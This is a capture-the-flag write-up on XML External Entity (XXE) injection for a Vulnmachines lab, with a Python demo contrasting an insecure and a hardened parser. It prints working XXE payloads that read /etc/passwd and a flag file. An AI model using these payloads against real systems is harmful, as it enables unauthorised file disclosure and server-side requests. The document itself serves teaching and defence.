XML External Entity writeup: Vulnmachines

Vulnmachines
3 min readDec 27, 2022


What is XML eXternal Entity (XXE)?

XML External Entity (XXE) is a web application vulnerability that arises when an XML parser resolves external entities while processing attacker-controlled XML. If the document declares an entity that points at an external resource (a local file or a URL), the parser fetches that resource and splices its contents into the document wherever the entity is referenced. An attacker who controls an XML input parameter can use this to read arbitrary files the application user can access, make the server issue requests on their behalf (SSRF), cause a denial of service (DoS), and, with some parser configurations, achieve command execution.

What is XML?

XML (eXtensible Markup Language) is designed to transfer and store data. A document is a tree of tagged elements, much like HTML, but the two differ in purpose:

XML is designed to transfer and store data.

HTML is designed to display data.

XML Structure

Look at the simple XML file below: the first line is the XML declaration, <vulnmachines> on the second line is the root element, and the 'to', 'from', 'heading' and 'body' tags are its child elements, which together make up a self-describing structure:

<?xml version="1.0" encoding="UTF-8"?>
<vulnmachines>
  <to>Vulnmachines</to>
  <from>TheSecOpsGroup</from>
  <heading>XXE Vulnerability</heading>
  <body>Follow us on Twitter @vulnmachines</body>
</vulnmachines>

Question:

Capture the flag by leveraging the XXE vulnerability.

Solution:

Step 1: Visit vulnmachines.com

Step 2: Go to Mission -> Game -> Mission. Select ‘XML External Entity’.

Step 3: Click on ‘Lab Access’.


Step 4: You will be redirected to the lab page.

Step 5: The vulnerable parameter here is the Message parameter. Craft an XML document whose DOCTYPE declares an external entity, as shown below, and send it in that parameter; the server's parser will resolve the entity and return the contents of a local file in its response.

Payload:

<!DOCTYPE item [ <!ELEMENT item ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<items><item name="item1">a</item>
<item name="item2">&xxe;</item>
<item name="item3">c</item>
<item name="item4">d</item>
</items>

Note: the SYSTEM keyword marks xxe as an external entity, so the parser replaces every &xxe; reference with the contents of file:///etc/passwd. If /etc/passwd comes back in the response for item2, the parser resolves external entities, and the same entity can be pointed at any file the application user is allowed to read.

Now revisit the hint. Hint: access 'Home/app' and read the flag file, i.e. look in the directory /home/app.

Flag: read the flag file at /home/app/f149.txt by changing only the entity's target:

<!DOCTYPE item [ <!ELEMENT item ANY >
<!ENTITY xxe SYSTEM "file:///home/app/f149.txt" >]>
<items><item name="item1">a</item>
<item name="item2">&xxe;</item>
<item name="item3">c</item>
<item name="item4">d</item>
</items>

Note: as before, SYSTEM declares an external entity, and &xxe; now expands to the contents of file:///home/app/f149.txt, which is returned in place of item2.
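To show why the payload above works, and what a fixed parser does differently, here is an added example (it is not the lab's code and not the author's): a small Python parser for the writeup's <items> document, built on the standard library's expat binding. It is run once with external entity resolution switched on, which is the insecure configuration the lab simulates, and once with external entities refused. The flag file path and its content are constructed for the demo, and the names build_payload, parse_items and demo are chosen here.

```python
"""Added example: the writeup's XXE payload against a minimal expat-based
<items> parser, in an insecure and a hardened configuration.
Not the vulnmachines lab's code; the flag file is created for the demo."""
import os
import tempfile
import xml.parsers.expat as expat
from urllib.parse import urlparse


def build_payload(uri):
    """Return the writeup's payload with the external entity pointing at uri."""
    return """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE items [ <!ELEMENT item ANY >
<!ENTITY xxe SYSTEM "%s" >]>
<items><item name="item1">a</item>
<item name="item2">&xxe;</item>
<item name="item3">c</item>
<item name="item4">d</item>
</items>""" % uri


def parse_items(xml_text, resolve_external=False):
    """Parse <items><item name="...">text</item>...</items> into a dict.

    resolve_external=True mimics a parser with external entity loading
    enabled: SYSTEM entities with file:// URIs are read from disk and spliced
    in where &xxe; appears. The default refuses every external entity
    reference, which is the hardened behaviour."""
    parser = expat.ParserCreate()
    items = {}
    current = {"name": None, "text": []}

    def start_element(tag, attrs):
        if tag == "item":
            current["name"] = attrs.get("name")
            current["text"] = []

    def end_element(tag):
        if tag == "item":
            items[current["name"]] = "".join(current["text"])
            current["name"] = None

    def character_data(data):
        if current["name"] is not None:
            current["text"].append(data)

    def external_entity_ref(context, base, system_id, public_id):
        # expat calls this for every reference to an external (SYSTEM) entity.
        if not resolve_external:
            raise ValueError("blocked external entity: %s" % system_id)
        url = urlparse(system_id)
        if url.scheme != "file":
            raise ValueError("unsupported entity scheme: %s" % url.scheme)
        with open(url.path, "rb") as fh:
            body = fh.read()
        # The child parser inherits the handlers above, so the file content
        # arrives through character_data exactly like ordinary element text.
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(body, True)
        return 1

    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = character_data
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.Parse(xml_text, True)
    return items


def demo():
    """Write a throw-away flag file (constructed for this example), then parse
    the payload once with external entities enabled and once hardened."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write("FLAG{xxe-demo}")
    try:
        payload = build_payload("file://" + path)
        leaked = parse_items(payload, resolve_external=True)
        try:
            parse_items(payload)
            hardened_error = None
        except ValueError as exc:
            hardened_error = str(exc)
    finally:
        os.unlink(path)
    return {"vulnerable": leaked, "hardened_error": hardened_error}


if __name__ == "__main__":
    out = demo()
    print("vulnerable parser, item2:", out["vulnerable"]["item2"])
    print("hardened parser:", out["hardened_error"])
```

The hardened branch is the point to take away: the fix for XXE is not filtering the input but configuring the parser so that DTD external entities are never resolved, for example leaving libxml2's XML_PARSE_NOENT and XML_PARSE_DTDLOAD options off, enabling the disallow-doctype-decl feature in Java parsers, or using defusedxml in Python.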

References:

https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing

https://github.com/payloadbox/xxe-injection-payload-list
